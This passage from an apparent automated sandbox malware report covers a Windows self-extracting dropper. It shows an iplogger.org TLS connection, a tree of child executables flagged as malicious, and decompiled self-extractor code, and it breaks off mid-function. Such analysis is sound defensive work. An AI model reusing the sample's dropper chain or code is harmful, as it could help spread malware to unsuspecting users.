                                                                                                              CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                              CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                              Nov 28, 2020 15:07:27.068033934 CET88.99.66.31443192.168.2.549737CN=*.iplogger.org CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Nov 20 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Nov 21 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                              CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                              CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029

                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Analysis Process: KeJ7Cl7flZ.exe PID: 4576 Parent PID: 5700

                                                                                                              General

                                                                                                              Start time:15:05:13
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\KeJ7Cl7flZ.exe'
                                                                                                              Imagebase:0xec0000
                                                                                                              File size:7922731 bytes
                                                                                                              MD5 hash:4E759849412063C6590936671CE4AA0E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: 002.exe PID: 3568 Parent PID: 4576

                                                                                                              General

                                                                                                              Start time:15:05:15
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe'
                                                                                                              Imagebase:0x1260000
                                                                                                              File size:1306112 bytes
                                                                                                              MD5 hash:6503C9C4F19A4B33B701CC5B97B349BC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: WerFault.exe PID: 204 Parent PID: 3568

                                                                                                              General

                                                                                                              Start time:15:05:17
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724
                                                                                                              Imagebase:0x2a0000
                                                                                                              File size:434592 bytes
                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: WerFault.exe PID: 204 Parent PID: 3568

                                                                                                              General

                                                                                                              Start time:15:05:27
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 740
                                                                                                              Imagebase:0x2a0000
                                                                                                              File size:434592 bytes
                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: Setup.exe PID: 6668 Parent PID: 4576

                                                                                                              General

                                                                                                              Start time:15:05:40
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:4240136 bytes
                                                                                                              MD5 hash:62EAEA103DD9BEB69E884F2EDE1ACD63
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: setup.exe PID: 6732 Parent PID: 6668

                                                                                                              General

                                                                                                              Start time:15:05:43
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s
                                                                                                              Imagebase:0x50000
                                                                                                              File size:3956884 bytes
                                                                                                              MD5 hash:D64E3CC11AFC6331715BDFEC5F26C2A0
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              Reputation:low

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: aliens.exe PID: 1112 Parent PID: 6732

                                                                                                              General

                                                                                                              Start time:15:06:58
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:528498344 bytes
                                                                                                              MD5 hash:0F88FD9D557FFBE67A8897FB0FC08EE7
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000013.00000002.511085870.0000000003310000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                                              Chronological Activities

                                                                                                              Analysis Process: jg2_2qua.exe PID: 5292 Parent PID: 4576

                                                                                                              General

                                                                                                              Start time:15:07:08
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:574976 bytes
                                                                                                              MD5 hash:676757904C8383FD9ACBEED15AA8DCC4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                                              Chronological Activities

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >

                                                                                                                Analysis Process: KeJ7Cl7flZ.exe PID: 4576 Parent PID: 5700 KeJ7Cl7flZ.exeCOMMON

                                                                                                                Executed Functions

                                                                                                                Function 00ED273E, Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 197filesleeptimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EC6A40: GetModuleHandleW.KERNEL32(kernel32), ref: 00EC6A55
                                                                                                                  • Part of subcall function 00EC6A40: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EC6A67
                                                                                                                  • Part of subcall function 00EC6A40: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EC6A98
                                                                                                                  • Part of subcall function 00ECF158: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00ECF160
                                                                                                                  • Part of subcall function 00ECF6B3: OleInitialize.OLE32(00000000), ref: 00ECF6CC
                                                                                                                  • Part of subcall function 00ECF6B3: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00ECF703
                                                                                                                  • Part of subcall function 00ECF6B3: SHGetMalloc.SHELL32(00F0CA28), ref: 00ECF70D
                                                                                                                  • Part of subcall function 00EC7790: GetCPInfo.KERNEL32(00000000,?), ref: 00EC77A1
                                                                                                                  • Part of subcall function 00EC7790: IsDBCSLeadByte.KERNEL32(00000000), ref: 00EC77B5
                                                                                                                • GetCommandLineW.KERNEL32 ref: 00ED2786
                                                                                                                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00ED27AD
                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00ED27BE
                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00ED27F8
                                                                                                                  • Part of subcall function 00ED2455: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00ED246B
                                                                                                                  • Part of subcall function 00ED2455: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00ED24A7
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ED2801
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00F22300,00000800), ref: 00ED281C
                                                                                                                • SetEnvironmentVariableW.KERNELBASE(sfxname,00F22300), ref: 00ED2828
                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00ED2833
                                                                                                                • _swprintf.LIBCMT ref: 00ED2872
                                                                                                                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00ED2884
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00ED288B
                                                                                                                • LoadIconW.USER32(00000000,00000064), ref: 00ED28A2
                                                                                                                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_000101A0,00000000), ref: 00ED28F3
                                                                                                                • Sleep.KERNEL32(?), ref: 00ED2921
                                                                                                                • CloseHandle.KERNEL32 ref: 00ED29AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$9,$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                • API String ID: 1108132279-1465982382
                                                                                                                • Opcode ID: 93a5d8dc5724781014c83a2c73abaafdfccec99490f4deddc347d1da22e3a051
                                                                                                                • Instruction ID: 677f9acc792cb2ba440a1537d0388f8e7cb76d164f131ed476e0a05dcd0b95db
                                                                                                                • Opcode Fuzzy Hash: 93a5d8dc5724781014c83a2c73abaafdfccec99490f4deddc347d1da22e3a051
                                                                                                                • Instruction Fuzzy Hash: 37612671504348AFC320EB61DD59F6B37ECEB98704F00502EF681B22A2DB788D46E761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECF19A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 54%
                                                                                                                			E00ECF19A(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				struct HRSRC__* _t14;
				char _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				long _t44;
				intOrPtr* _t46;
				struct HRSRC__* _t47;

				_t14 = FindResourceW( *0xf0ca3c, _a4, "PNG");
				_t47 = _t14;
				if(_t47 == 0) {
					return _t14;
				}
				_t44 = SizeofResource( *0xf0ca3c, _t47);
				if(_t44 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0xf0ca3c, _t47);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t48 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t44); // executed
					_t35 = _t19;
					if(_t35 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t35) == 0) {
						L14:
						GlobalFree(_t35);
						goto L15;
					}
					E00ED4C60(_t20, _t48, _t44);
					_v8 = 0;
					_push( &_v8);
					_push(0);
					_push(_t35);
					if( *0xf2614c() == 0) {
						_t26 = E00ECF12F(_t24, _t37, _v20, 0); // executed
						_t38 = _v28;
						_t46 = _t26;
						 *0xee7220(_t38);
						 *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
						if(_t46 != 0) {
							 *((intOrPtr*)(_t46 + 8)) = 0;
							if( *((intOrPtr*)(_t46 + 8)) == 0) {
								_push(0xffffff);
								_t33 =  &_v20;
								_push(_t33);
								_push( *((intOrPtr*)(_t46 + 4)));
								L00ED332E(); // executed
								if(_t33 != 0) {
									 *((intOrPtr*)(_t46 + 8)) = _t33;
								}
							}
							 *0xee7220(1);
							 *((intOrPtr*)( *((intOrPtr*)( *_t46))))();
						}
					}
					GlobalUnlock(_t35);
					goto L14;
				}
				goto L4;
			}





















                                                                                                                0x00ecf1ac
                                                                                                                0x00ecf1b2
                                                                                                                0x00ecf1b6
                                                                                                                0x00ecf2b0
                                                                                                                0x00ecf2b0
                                                                                                                0x00ecf1ca
                                                                                                                0x00ecf1ce
                                                                                                                0x00ecf1ee
                                                                                                                0x00ecf1ee
                                                                                                                0x00ecf2ac
                                                                                                                0x00000000
                                                                                                                0x00ecf2ac
                                                                                                                0x00ecf1d7
                                                                                                                0x00ecf1df
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecf1e2
                                                                                                                0x00ecf1e8
                                                                                                                0x00ecf1ec
                                                                                                                0x00ecf1fc
                                                                                                                0x00ecf200
                                                                                                                0x00ecf206
                                                                                                                0x00ecf20a
                                                                                                                0x00ecf2a6
                                                                                                                0x00ecf2a6
                                                                                                                0x00000000
                                                                                                                0x00ecf2ab
                                                                                                                0x00ecf219
                                                                                                                0x00ecf29f
                                                                                                                0x00ecf2a0
                                                                                                                0x00000000
                                                                                                                0x00ecf2a0
                                                                                                                0x00ecf222
                                                                                                                0x00ecf22a
                                                                                                                0x00ecf232
                                                                                                                0x00ecf233
                                                                                                                0x00ecf234
                                                                                                                0x00ecf23d
                                                                                                                0x00ecf244
                                                                                                                0x00ecf249
                                                                                                                0x00ecf24d
                                                                                                                0x00ecf257
                                                                                                                0x00ecf25d
                                                                                                                0x00ecf261
                                                                                                                0x00ecf266
                                                                                                                0x00ecf26b
                                                                                                                0x00ecf26d
                                                                                                                0x00ecf272
                                                                                                                0x00ecf276
                                                                                                                0x00ecf277
                                                                                                                0x00ecf27a
                                                                                                                0x00ecf281
                                                                                                                0x00ecf283
                                                                                                                0x00ecf283
                                                                                                                0x00ecf281
                                                                                                                0x00ecf28e
                                                                                                                0x00ecf296
                                                                                                                0x00ecf296
                                                                                                                0x00ecf261
                                                                                                                0x00ecf299
                                                                                                                0x00000000
                                                                                                                0x00ecf299
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • FindResourceW.KERNEL32(00ED0109,PNG,?,?,?,00ED0109,00000066), ref: 00ECF1AC
                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00ED0109,00000066), ref: 00ECF1C4
                                                                                                                • LoadResource.KERNEL32(00000000,?,?,?,00ED0109,00000066), ref: 00ECF1D7
                                                                                                                • LockResource.KERNEL32(00000000,?,?,?,00ED0109,00000066), ref: 00ECF1E2
                                                                                                                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00ED0109,00000066), ref: 00ECF200
                                                                                                                • GlobalLock.KERNEL32 ref: 00ECF211
                                                                                                                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00ECF27A
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00ECF299
                                                                                                                • GlobalFree.KERNEL32 ref: 00ECF2A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                                                                                • String ID: PNG
                                                                                                                • API String ID: 4097654274-364855578
                                                                                                                • Opcode ID: 9d99b7f89f76eecb3dc5b2026232ad5d11644a045587ceef17507e6e293c8599
                                                                                                                • Instruction ID: 156e29c309cc8f2ef3defeced540f5bc5a31ad401a97fe4d68a5aaf218e038cc
                                                                                                                • Opcode Fuzzy Hash: 9d99b7f89f76eecb3dc5b2026232ad5d11644a045587ceef17507e6e293c8599
                                                                                                                • Instruction Fuzzy Hash: 4431B07520434AAFC7109F62ED48E1BBFA9FF447547044528F945B7260DB32DC058BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC80F7, Relevance: 17.0, APIs: 3, Strings: 6, Instructions: 1263COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E00EC80F7(signed int __edx) {
				void* __edi;
				void* __ebp;
				signed int _t295;
				signed int _t296;
				void* _t306;
				signed int _t328;
				intOrPtr _t332;
				signed int _t333;
				intOrPtr _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				intOrPtr _t350;
				signed int _t352;
				signed int _t353;
				signed int _t360;
				signed int _t362;
				signed int _t365;
				signed int _t368;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t376;
				signed int _t381;
				char _t394;
				signed int* _t401;
				signed int _t403;
				signed int _t406;
				signed int _t407;
				signed int* _t408;
				signed int _t409;
				signed int _t410;
				signed int _t415;
				void* _t421;
				signed int* _t423;
				signed int _t424;
				signed int _t431;
				signed int _t432;
				void* _t438;
				signed int _t439;
				signed int _t440;
				intOrPtr* _t448;
				signed int* _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				intOrPtr _t463;
				signed int* _t470;
				signed int* _t474;
				signed int _t481;
				char* _t482;
				signed int _t484;
				char* _t485;
				signed int _t488;
				signed int _t500;
				signed int _t501;
				signed int _t503;
				signed int _t506;
				signed int _t509;
				signed int _t517;
				signed int* _t523;
				signed int* _t524;
				intOrPtr _t542;
				intOrPtr _t543;
				void* _t562;
				signed int _t569;
				signed short _t577;
				signed int _t592;
				signed int _t599;
				void* _t603;
				signed int _t608;
				signed int _t609;
				signed int* _t611;
				signed int* _t612;
				intOrPtr _t613;
				signed int _t615;
				signed int _t617;
				intOrPtr* _t630;
				void* _t632;
				void* _t634;
				intOrPtr _t635;
				signed int _t639;
				signed int _t642;
				signed int _t645;
				signed int* _t653;
				signed int* _t655;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t669;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t680;
				intOrPtr _t685;
				void* _t690;
				signed int _t692;
				signed int _t694;
				signed int _t695;
				signed int _t702;
				signed int _t703;
				signed int* _t707;
				signed int _t708;
				signed int _t711;
				signed int _t712;
				signed int _t715;
				signed int _t716;
				signed int _t717;
				intOrPtr _t719;
				signed int _t721;
				signed int _t722;
				signed int _t726;
				signed short* _t727;
				signed int _t730;
				void* _t731;
				void* _t732;

				_t659 = __edx;
				_t732 = _t731 - 0x70;
				E00ED3344();
				E00ED3370();
				 *(_t730 + 0x50) =  *(_t730 + 0x50) | 0xffffffff;
				 *(_t730 + 0x10) =  *(_t730 + 0x10) | 0xffffffff;
				 *(_t730 + 0x2c) =  *(_t730 + 0x2c) | 0xffffffff;
				 *(_t730 + 0x28) = 0;
				_t569 = 0;
				 *(_t730 + 0x4c) = 0;
				 *(_t730 + 0x20) = 0;
				 *(_t730 + 0x3c) = 0;
				 *(_t730 + 0x38) = 0;
				 *((intOrPtr*)(_t730 - 0x50)) = 0;
				 *(_t730 - 0x4c) = 0;
				 *((intOrPtr*)(_t730 - 0x48)) = 0;
				 *((intOrPtr*)(_t730 - 0x44)) = 0;
				 *((char*)(_t730 - 0x40)) = 0;
				 *((intOrPtr*)(_t730 - 4)) = 0;
				 *(_t730 + 0x5c) = 0;
				 *(_t730 + 0x54) = 0;
				 *((intOrPtr*)(_t730 + 0x34)) = 0;
				 *(_t730 + 0x30) = 0;
				E00EC7736((0 |  *0xf16de9 == 0x00000000) & 0x000000ff, (0 |  *0xf16de9 == 0x00000000) & 0x000000ff, 0xf19f02);
				 *(_t730 + 0x40) = 0;
				 *((intOrPtr*)(_t730 + 0x14)) = 0;
				 *(_t730 + 0x24) = 0;
				 *(_t730 + 0x64) = 0;
				E00EC7C56(_t730 - 0x74, 0x40);
				 *((char*)(_t730 - 4)) = 1;
				E00EC6784();
				 *((intOrPtr*)(_t730 - 0x3c)) = 0;
				 *((intOrPtr*)(_t730 - 0x38)) = 0;
				 *((intOrPtr*)(_t730 - 0x34)) = 0;
				 *((intOrPtr*)(_t730 - 0x30)) = 0;
				 *((char*)(_t730 - 0x2c)) = 0;
				 *((char*)(_t730 - 4)) = 3;
				E00EC6784();
				 *0xefb540 =  *0xf15d14;
				 *((char*)(_t730 - 4)) = 4;
				 *0xefb53c = 1;
				 *0xefb578 = 0;
				L1:
				while(E00EC772D() == 0) {
					L3:
					while(_t671 < 0x40 ||  *0xf0c82c != 0) {
						 *0xefb588 =  *((intOrPtr*)(_t730 - 0x74)) + _t703;
						if(E00ECA0EE(0xefb580, 4) == 0) {
							_t569 = 0x33;
							L57:
							 *(_t730 + 0x64) = 1;
							break;
						}
						if(E00EC9938(0xefb580) == 0) {
							_t645 =  *0xf0b660; // 0xa
							_t659 = 0;
							__eflags = (_t645 ^  *(_t730 + 0x40)) & 0x0000ffff;
							if(((_t645 ^  *(_t730 + 0x40)) & 0x0000ffff) == 0) {
								L49:
								_t500 = E00EC9982(0xefb580);
								__eflags = _t500;
								if(_t500 != 0) {
									L54:
									_t592 = 0;
									__eflags = 0;
									 *(_t730 + 0x24) = 0;
									L55:
									 *(_t730 + 0x64) = 1;
									L59:
									__eflags =  *0xf0c82c;
									_t332 =  *0xf0b5d8; // 0x78e000
									 *((intOrPtr*)(_t730 - 0x20)) = _t332;
									_t333 =  *0xf0b5dc; // 0x0
									 *(_t730 - 0x1c) = _t333;
									_t334 =  *0xf0b598; // 0x31dc72d
									 *((intOrPtr*)(_t730 - 0x24)) = _t334;
									_t335 =  *0xf0b5a0; // 0x116
									 *(_t730 + 4) = _t335;
									_t336 =  *0xf0b5a4; // 0x0
									 *(_t730 - 0x10) = _t336;
									if( *0xf0c82c != 0) {
										 *0xf0c830 = _t592;
										_t484 = E00EC800E(0xf19f02);
										__eflags = _t484;
										_t485 = L"zx01";
										if(_t484 == 0) {
											_t485 = L"z01";
										}
										E00EC373A(0xf19f02, _t485, 0x800);
										_t694 =  *0xf0b5b8; // 0x0
										__eflags = _t694;
										if(__eflags != 0) {
											 *0xee7220(1);
											_t592 = _t694;
											 *((intOrPtr*)( *((intOrPtr*)( *_t694))))();
										}
										 *0xf0b5b8 = 0;
										_t488 = E00EC9F9D(_t592, __eflags);
										 *0xf16de9 =  *0xf16de9 == 0;
										E00EC7736((_t488 & 0xffffff00 |  *0xf16de9 == 0x00000000) & 0x000000ff, (_t488 & 0xffffff00 |  *0xf16de9 == 0x00000000) & 0x000000ff, 0xf19f02);
										_t671 =  *(_t730 + 0x60);
									}
									_t337 = 0;
									 *(_t730 + 0x44) = 0;
									__eflags = _t671;
									if(_t671 <= 0) {
										L220:
										_t672 =  *0xf0b5b8; // 0x0
										 *0xee7220();
										 *((intOrPtr*)( *((intOrPtr*)( *_t672 + 0x10))))();
										_t673 =  *0xf0b5b8; // 0x0
										 *0xee7220();
										 *0xf0b5d8 =  *((intOrPtr*)( *((intOrPtr*)( *_t673 + 0x14))))();
										 *0xf0b5dc = _t659;
										E00ECA505(_t659,  *0xf0b594, 0x2000,  *((intOrPtr*)(_t730 - 0x20)),  *(_t730 - 0x1c), 0);
										 *(_t730 + 0x28) =  *(_t730 + 0x28) + 1;
										__eflags =  *(_t730 + 0x64);
										 *0xf0b598 =  *((intOrPtr*)(_t730 - 0x24));
										 *0xf0b5a0 =  *(_t730 + 4);
										 *0xf0b5a4 =  *(_t730 - 0x10);
										if( *(_t730 + 0x64) == 0) {
											goto L1;
										}
										goto L223;
									} else {
										_t599 =  *(_t730 + 0x28) << 6;
										__eflags = _t599;
										 *(_t730 - 0x18) = _t599;
										while(1) {
											 *(_t730 + 0x50) = _t599 + _t337;
											 *0xefb588 = _t337 * 0x48 +  *((intOrPtr*)(_t730 - 0x74));
											_t350 = E00EC68A2(_t730 - 0x134);
											__eflags =  *0xf0c82c;
											_t707 =  *0xefb588; // 0x31ef6f0
											 *((intOrPtr*)(_t730 + 0x48)) = _t350;
											if( *0xf0c82c != 0) {
												_t642 = _t707[8];
												__eflags = _t642 -  *0xf0c830; // 0xffffffff
												if(__eflags != 0) {
													__eflags = _t642 - ( *0xf0b650 & 0x0000ffff);
													if(__eflags != 0) {
														E00EC8049(__eflags, 0xf19f02, 0x800, _t642);
													} else {
														_t481 = E00EC800E(0xf19f02);
														__eflags = _t481;
														_t482 = L"zipx";
														if(_t481 == 0) {
															_t482 = L"zip";
														}
														E00EC373A(0xf19f02, _t482, 0x800);
													}
													_t474 =  *0xefb588; // 0x31ef6f0
													_t680 =  *0xf0b5b8; // 0x0
													 *0xf0c830 = _t474[8];
													__eflags = _t680;
													if(_t680 != 0) {
														 *0xee7220(1);
														_t642 = _t680;
														 *((intOrPtr*)( *((intOrPtr*)( *_t680))))();
													}
													__eflags = 0;
													 *0xf0b5b8 = 0;
													E00EC9F9D(_t642, 0);
													_t707 =  *0xefb588; // 0x31ef6f0
												}
											}
											_t675 =  *_t707 +  *0xf0b5e0;
											_t708 = _t707[1];
											asm("adc esi, [0xf0b5e4]");
											_t352 = E00ED3930(_t675, _t708, 0x2000, 0);
											 *(_t730 + 0x68) = _t352;
											_t603 = _t675 - _t352;
											_t353 = _t708;
											asm("sbb eax, edx");
											_t659 = 0;
											 *(_t730 + 0x58) = _t353;
